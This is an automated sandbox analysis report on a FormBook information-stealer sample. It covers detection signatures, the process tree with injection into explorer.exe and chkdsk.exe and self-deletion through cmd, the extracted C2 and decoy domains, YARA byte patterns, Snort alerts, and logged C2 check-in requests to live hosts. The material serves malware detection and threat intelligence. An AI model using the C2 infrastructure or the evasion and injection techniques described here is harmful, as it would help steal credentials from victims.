Windows Analysis Report 2u2u8wnrrW.exe

Overview

General Information

Sample Name: 2u2u8wnrrW.exe
Analysis ID: 502325
MD5: 51dcc89ed1035a6c2fc57ada8dcb4dc2
SHA1: 0e59efbffdd8153c61f20a6039110474c50c20e9
SHA256: 092be1f456b0c24d932d6c4e4c44cfd0c9abc6c0418bf1567e67826cb51aef14
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • 2u2u8wnrrW.exe (PID: 6996 cmdline: 'C:\Users\user\Desktop\2u2u8wnrrW.exe' MD5: 51DCC89ED1035A6C2FC57ADA8DCB4DC2)
    • 2u2u8wnrrW.exe (PID: 7164 cmdline: C:\Users\user\Desktop\2u2u8wnrrW.exe MD5: 51DCC89ED1035A6C2FC57ADA8DCB4DC2)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 6464 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 3324 cmdline: /c del 'C:\Users\user\Desktop\2u2u8wnrrW.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
  • 0x16b18:$sqlite3text: 68 38 2A 90 C5
  • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(table truncated; 24 entries in the full report)

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.2u2u8wnrrW.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.2u2u8wnrrW.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.2u2u8wnrrW.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
  • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
  • 0x15d18:$sqlite3text: 68 38 2A 90 C5
  • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
  • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
3.2.2u2u8wnrrW.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.2u2u8wnrrW.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(table truncated; 8 entries in the full report)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}
Multi AV Scanner detection for submitted file
Source: 2u2u8wnrrW.exe | Virustotal: Detection: 16%
Yara detected FormBook
Source: Yara match | File source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY
Source: 3.2.2u2u8wnrrW.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_0538387E GetEncryptedFileVersionExt, 11_2_0538387E
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 11_2_0537A61C GetEncryptedFileVersionExt, 11_2_0537A61C
Source: 2u2u8wnrrW.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 2u2u8wnrrW.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: chkdsk.pdbGCTL | source: 2u2u8wnrrW.exe, 00000003.00000002.442464835.0000000001290000.00000040.00020000.sdmp
Source: Binary string: chkdsk.pdb | source: 2u2u8wnrrW.exe, 00000003.00000002.442464835.0000000001290000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP | source: 2u2u8wnrrW.exe, 00000003.00000003.372062420.0000000000F70000.00000004.00000001.sdmp, chkdsk.exe, 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: 2u2u8wnrrW.exe, chkdsk.exe
Source: C:\Users\user\Desktop\2u2u8wnrrW.exe | Code function: 4x nop then pop ebx | 3_2_00406AB9
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4x nop then pop ebx | 11_2_00AB6AB9

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49813 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49813 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49813 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 8.212.24.67:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 8.212.24.67:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 8.212.24.67:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49837 -> 172.67.216.2:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49837 -> 172.67.216.2:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49837 -> 172.67.216.2:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 172.67.216.2 80
Source: C:\Windows\explorer.exe | Domain query: www.seal-brother.com
Source: C:\Windows\explorer.exe | Domain query: www.kangrungao.com
Source: C:\Windows\explorer.exe | Domain query: www.healthyweekendtips.com
Source: C:\Windows\explorer.exe | Network Connect: 35.186.238.101 80
Source: C:\Windows\explorer.exe | Domain query: www.esyscoloradosprings.com
Source: C:\Windows\explorer.exe | Network Connect: 108.167.135.122 80
Source: C:\Windows\explorer.exe | Domain query: www.govindfinance.com
Source: C:\Windows\explorer.exe | Network Connect: 59.106.13.53 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Domain query: www.driventow.com
Source: C:\Windows\explorer.exe | Network Connect: 8.212.24.67 80
Source: C:\Windows\explorer.exe | Domain query: www.satellitephonstore.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.esyscoloradosprings.com/fqiq/
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic | HTTP traffic detected: GET /fqiq/?M8sli0XH=Sq1XZHSp0Fahcv5+gSE8w/MNMhRnHgbusC6/nQsgBpT+5tokIrb/ucxwlvTI4NNTcxne7QOgew==&eL3dh=5jNDd4kX HTTP/1.1 | Host: www.satellitephonstore.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=mnFbYCr8dRmDLyqklk1rPiA6Of2qOAThWl37YLVanslLOc89q6CMhoedr+7VG/dsSCitRF0szg== HTTP/1.1 | Host: www.seal-brother.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /fqiq/?M8sli0XH=WJEXqHgQjytEiPF7j6bk2V/X0M1eNxv0v3X6q4y0idXjxAWnze1B3elnUPttxbcH5sirVrhN7g==&eL3dh=5jNDd4kX HTTP/1.1 | Host: www.driventow.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=c0qy46zOQOLzkfDDWvLWas23i13YCpczqQNjq5UjgzOv0kTDSt1UXZZmGaHbw3hLRr1ARfuDRg== HTTP/1.1 | Host: www.kangrungao.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /fqiq/?M8sli0XH=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDFtlKJiid6rvTcStxw==&eL3dh=5jNDd4kX HTTP/1.1 | Host: www.healthyweekendtips.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8M+9D3INxKq1ETGrvw== HTTP/1.1 | Host: www.esyscoloradosprings.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Wed, 13 Oct 2021 17:59:38 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "615c5dca-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Wed, 13 Oct 2021 17:59:50 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "615f9602-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 503 Service Unavailable | Content-Type: text/html; charset=UTF-8 | Content-Length: 884 | Connection: close | P3P: CP="CAO PSA OUR" | Expires: Thu, 01 Jan 1970 00:00:00 GMT | Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 | Pragma: no-cache | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 23 61 61 61 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 20 20 7d 0d 0a 20 20 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 20 20 62 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 3c 68 31 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 6f 77 6e 6c 6f 61 64 20 6f 66 20 74 68 65 20 76 69 72 75 73 2f 73 70 79 77 61 72 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 63 6f 6d 70 61 6e 79 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 69 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 62 3e 46 69 6c 65 20 6e 61 6d 65 3a 3c 2f 62 3e 20 20 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>Virus/Spyware Download Bloc
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.375200182.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: 2u2u8wnrrW.exe, 00000000.00000002.374665647.00000000033B1000.00000004.00000001.sdmp | String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
